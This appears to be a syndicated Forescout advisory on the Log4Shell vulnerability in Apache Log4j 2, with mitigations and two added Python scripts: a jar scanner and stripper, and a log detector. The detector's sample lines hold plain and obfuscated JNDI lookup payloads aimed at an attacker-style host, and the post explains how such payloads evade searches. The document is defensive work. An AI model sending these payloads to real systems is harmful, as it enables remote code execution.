Forescout’s Response to CVE-2021-44228 Apache Log4j 2

On December 9th 2021, Apache published an advisory for a zero-day vulnerability in Apache Log4j 2 (CVE-2021-44228), now widely referred to as “Log4Shell”. The vulnerability is rated “Critical” with a CVSS score of 10.0 and allows Remote Code Execution with the privileges of the Java process that runs the vulnerable application, which on many servers means root or SYSTEM.

When exploited, the vulnerability lets an attacker run arbitrary code on the device and take full control of it. Any exploited device should be considered compromised, and so, potentially, should any device that trusted the compromised one.


Our Commitment to Security
Forescout has identified the affected components and is updating its systems and products. Forescout’s security team has completed its investigation of the company’s networks and found no evidence of compromise at this time. The team has also updated the rules and signatures of the company’s security solutions to detect and block any attempt to exploit our platforms, and our defenders remain on high alert.

For the latest information on how to update your Forescout products, please refer to KB Article #12049.

Protecting Your Network
To address the vulnerability, Forescout recommends applying the latest security updates from Apache. The information below covers the workarounds Apache has published for systems that cannot be patched immediately.

If affected devices are identified, Forescout recommends mitigating the risk until patches can be applied. The following mitigations are those recommended by Apache at the time of writing. They reduce exposure but should not be considered a complete solution: Apache has since withdrawn the formatMsgNoLookups and %m{nolookups} workarounds as insufficient, and removing the JndiLookup class is the only workaround it still recommends for releases that cannot be upgraded.

  • If the vulnerable Log4j 2 component cannot be updated, Log4j 2 versions 2.10 to 2.14.1 support setting the system property log4j2.formatMsgNoLookups to true, which disables message lookups. Ensure the property is passed to the Java Virtual Machine in its startup scripts, for example as -Dlog4j2.formatMsgNoLookups=true.
  • Alternatively, customers using Log4j 2.10 to 2.14.1 may set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true to force the same change.
  • Users of Log4j 2.7 and later may specify %m{nolookups} in the PatternLayout configuration to prevent lookups in log event messages.
  • For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. Afterwards, confirm that the class is no longer listed in the archive and restart the application, since a running JVM keeps the class it has already loaded. If log4j-core is bundled inside a larger archive (a WAR or a fat jar), the inner jar must be treated the same way.
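The class-removal workaround above is easy to apply to one jar by hand but hard to apply reliably across a fleet, where log4j-core is often buried inside WAR files and fat jars. The following Python script is an added example, not code from Forescout or Apache: it inventories archives under a directory, reports the log4j-core version from the Maven pom.properties marker and whether the JndiLookup class is present (descending into nested archives), and writes a copy of a jar with that class removed, which is what the zip -q -d command does. The jar fixtures it builds for its own demo are constructed stubs, not real log4j builds.

```python
"""Added example, not code from Forescout or Apache: inventory log4j-core jars, report the
version and whether the vulnerable JndiLookup class is present (descending into fat jars
and WARs), and write a copy with that class removed, the same effect as Apache's
`zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`.
The fixtures built by build_sample_jar() are constructed stubs, not real log4j builds."""
import io
import os
import tempfile
import zipfile
from typing import Dict, Iterator, Optional, Tuple

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven marker that log4j-core jars carry; its version= line identifies the release.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def _version_from_pom(data: bytes) -> Optional[str]:
    for line in data.decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def scan_jar_bytes(data: bytes, depth: int = 0, max_depth: int = 3) -> Dict[str, object]:
    """Return {'version': str|None, 'jndi_lookup': bool} for an archive given as bytes.
    Nested archives (Spring Boot fat jars, WAR files) are scanned recursively so a
    bundled log4j-core is not missed."""
    result: Dict[str, object] = {"version": None, "jndi_lookup": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name == JNDI_CLASS:
                result["jndi_lookup"] = True
            elif name.endswith(POM_PROPS):
                result["version"] = _version_from_pom(zf.read(name))
            elif name.lower().endswith(ARCHIVE_EXT) and depth < max_depth:
                try:
                    inner = scan_jar_bytes(zf.read(name), depth + 1, max_depth)
                except zipfile.BadZipFile:
                    continue
                result["jndi_lookup"] = result["jndi_lookup"] or inner["jndi_lookup"]
                result["version"] = result["version"] or inner["version"]
    return result


def scan_jar(path: str) -> Dict[str, object]:
    with open(path, "rb") as fh:
        return scan_jar_bytes(fh.read())


def find_archives(root: str) -> Iterator[Tuple[str, Dict[str, object]]]:
    """Walk `root` and yield (path, scan result) for every archive found."""
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                try:
                    yield path, scan_jar(path)
                except zipfile.BadZipFile:
                    continue


def strip_jndi_lookup(src: str, dst: str) -> int:
    """Copy archive `src` to `dst` without the top-level JndiLookup entry (what Apache's
    `zip -q -d` workaround does). Returns the number of entries removed. A running JVM
    keeps the class it already loaded, so the application still has to be restarted."""
    removed = 0
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as zout:
        for item in zin.infolist():
            if item.filename == JNDI_CLASS:
                removed += 1
                continue
            zout.writestr(item, zin.read(item.filename))
    return removed


def build_sample_jar(path: str, version: str, with_jndi: bool = True) -> str:
    """Constructed fixture, not a real log4j build: only the pom.properties marker and,
    optionally, a stub JndiLookup.class entry."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return path


def demo() -> Dict[str, object]:
    """Round trip on constructed fixtures: scan a vulnerable jar, strip the class, rescan,
    and show that the scan also finds the same jar bundled inside a fat jar."""
    work = tempfile.mkdtemp(prefix="log4j-demo-")
    vuln = build_sample_jar(os.path.join(work, "log4j-core-2.14.1.jar"), "2.14.1")
    fixed = os.path.join(work, "log4j-core-2.14.1-nojndi.jar")
    removed = strip_jndi_lookup(vuln, fixed)
    fat = os.path.join(work, "app-all.jar")
    with zipfile.ZipFile(fat, "w") as zf:
        zf.write(vuln, "BOOT-INF/lib/log4j-core-2.14.1.jar")
    return {"before": scan_jar(vuln), "removed": removed,
            "after": scan_jar(fixed), "nested": scan_jar(fat),
            "found": sorted(os.path.basename(p) for p, r in find_archives(work) if r["jndi_lookup"])}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The scan reports presence of the class rather than deciding "vulnerable" from the version string alone, because a jar whose version looks patched can still be a repackaged copy; the class entry is the signal that matters for this workaround. strip_jndi_lookup only edits the top-level archive, exactly like zip -d, so a bundled log4j-core inside a WAR or fat jar has to be extracted, treated, and repacked.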

In addition to the workarounds and patches, the following simple mitigating actions can be taken.

  • Configuring a firewall to allow outgoing traffic only to an allowlist of trusted addresses and protocols prevents an attacker from communicating outside of the network. For Log4Shell this blocks the second stage of the attack, in which the vulnerable JVM connects back to an attacker-controlled LDAP or RMI server to fetch the payload.
  • Storing logs under different privileges from the application (for example, on a separate log server that the application account cannot write to) makes it harder for attackers to cover their tracks, and therefore makes discovery easier.
  • Exploitation attempts can be detected by inspecting log files (web-server access logs, proxy logs and the application’s own logs) for the characteristic pattern ${jndi:ldap://. Note that attackers also use other schemes (rmi, dns, ldaps) and hide the string behind nested lookups such as ${${lower:j}ndi:...} or URL encoding, so a search for the literal string alone will miss many attempts.
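The detector below is an added example, not part of Forescout’s post, showing how to search logs for the pattern in a way that survives the common evasions: it URL-decodes each line, repeatedly unwraps the Log4j lookup tricks attackers use to hide the string (${lower:j}, ${upper:n}, ${::-j} and other “:-default” lookups), and then matches a jndi lookup with any scheme rather than only ldap. The access-log lines it runs over are constructed for the example, using documentation IP space.

```python
"""Added example, not code from Forescout's post: flag Log4Shell exploitation attempts in
web-server access logs. Grepping for the literal "${jndi:ldap://" misses the obfuscated
forms seen in the wild, so this detector URL-decodes each line, collapses the Log4j
lookup tricks used to hide the string (${lower:j}, ${upper:n}, ${::-j} and other
":-default" lookups) and then matches a jndi lookup with any scheme.
SAMPLE_LINES are constructed for this example (203.0.113.0/24 is documentation space)."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# Innermost-only patterns (no braces inside the group) so that nested obfuscation is
# unwrapped one layer per pass of normalize().
_LOWER = re.compile(r"\$\{\s*lower\s*:\s*([^{}]*?)\s*\}", re.I)
_UPPER = re.compile(r"\$\{\s*upper\s*:\s*([^{}]*?)\s*\}", re.I)
# ${anything:-x} and ${::-x}: an undefined lookup resolves to its default value x.
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*?)\}")
# The actual lookup, with any scheme (ldap, ldaps, rmi, dns, iiop, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.I)

SAMPLE_LINES: List[str] = [  # constructed sample input, not real traffic
    '203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${lower:r}mi://203.0.113.10:1099/x}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/x}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:04 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldaps%3A%2F%2F203.0.113.10%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.4 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/jndi-ldap.html HTTP/1.1" '
    '200 8192 "-" "Mozilla/5.0"',
]


def normalize(line: str, rounds: int = 10) -> str:
    """URL-decode the line and unwrap the lookup tricks until nothing changes."""
    text = unquote(line)
    for _ in range(rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(r"\1", new)
        if new == text:
            break
        text = new
    return text


def detect(line: str) -> Optional[Dict[str, object]]:
    """Return details of the first jndi lookup in the line, or None if there is none."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    end = norm.find("}", m.end())
    return {
        "scheme": m.group(1).lower(),
        "payload": norm[m.start(): end + 1 if end != -1 else len(norm)],
        # True when a grep for the literal "${jndi:" on the raw line would have missed it.
        "obfuscated": "${jndi:" not in line.lower(),
    }


def scan_lines(lines: List[str]) -> List[Tuple[int, Dict[str, object]]]:
    """Run detect() over a log and return (line index, details) for every hit."""
    hits = []
    for i, line in enumerate(lines):
        hit = detect(line)
        if hit:
            hits.append((i, hit))
    return hits


if __name__ == "__main__":
    for i, hit in scan_lines(SAMPLE_LINES):
        print(f"line {i}: scheme={hit['scheme']} obfuscated={hit['obfuscated']} {hit['payload']}")
```

Run over the sample, the first line is the plain pattern, the next three would be missed by a literal search (case-flipping lookups, default-value lookups, URL encoding), and the last line, which merely mentions jndi in a path, is not flagged. The normalizer only handles one layer of URL encoding and the lookup forms listed; treat any remaining ${ in request headers or parameters as worth a look as well.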


*** This is a Security Bloggers Network syndicated blog from Forescout, authored by Forescout Research Labs.